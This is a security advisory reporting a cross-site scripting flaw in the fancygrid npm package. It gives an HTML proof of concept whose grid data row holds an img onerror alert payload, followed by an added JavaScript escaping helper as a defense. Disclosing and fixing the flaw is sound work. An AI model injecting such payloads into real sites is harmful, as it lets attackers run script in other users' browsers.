Vulnerability: Cross-Site Scripting (XSS)
Severity: 5.4
Language: JavaScript
Registry: npm


fancygrid is vulnerable to Cross-Site Scripting (XSS).

Proof of Concept

Save the following file and open it in any browser:

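<html lang="en">
<head>
  <!-- FancyGrid stylesheet and script; both URLs are blank in the report -->
  <link href="" rel="stylesheet">
  <script src=""></script>
</head>
<body>
  <div id="grid"></div>
  <script>
    document.addEventListener("DOMContentLoaded", function() {
      new FancyGrid({
        renderTo: 'grid',
        width: 300,
        height: 200,
        data: [
          // The first row's name carries markup that the grid renders as HTML
          {name: 'Nick"><img src=x onerror=alert(1)>', age: 30},
          {name: 'Fred', age: 25},
          {name: 'Mike', age: 35}
        ],
        columns: [{
          index: 'name',
          title: 'Name',
          type: 'string'
        }, {
          type: 'number',
          index: 'age',
          title: 'Age'
        }]
      });
    });
  </script>
</body>
</html>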

The XSS payload in the first row's name field is executed when the grid renders.
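
A defensive counterpart to the proof of concept, added here as an example and not taken from the report or from FancyGrid's code: escape untrusted string fields before handing rows to a grid that inserts cell values into the page as HTML. The helper names escapeHtml and sanitizeRows are hypothetical, and the sample rows are the ones from the proof of concept.

```javascript
// Added example: escape untrusted strings before a grid renders them as HTML.
// escapeHtml and sanitizeRows are hypothetical helper names, not FancyGrid APIs.

const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;'
};

// Replace the five characters that can open a tag, close an attribute,
// or start an entity when the value is inserted into markup.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Return a copy of the rows with every string field escaped.
// Numbers, booleans and null pass through unchanged so that numeric
// columns (such as 'age') keep their type. The input is not mutated.
function sanitizeRows(rows) {
  return rows.map((row) => {
    const clean = {};
    for (const [key, val] of Object.entries(row)) {
      clean[key] = typeof val === 'string' ? escapeHtml(val) : val;
    }
    return clean;
  });
}

// Constructed sample input: the rows from the proof of concept above.
const untrustedRows = [
  { name: 'Nick"><img src=x onerror=alert(1)>', age: 30 },
  { name: 'Fred', age: 25 },
  { name: 'Mike', age: 35 }
];

// Pass safeRows, not untrustedRows, as the grid's `data`.
const safeRows = sanitizeRows(untrustedRows);
console.log(safeRows[0].name);
```

If the grid version in use already escapes cell values itself, applying this step as well makes the entities show up literally in the cells.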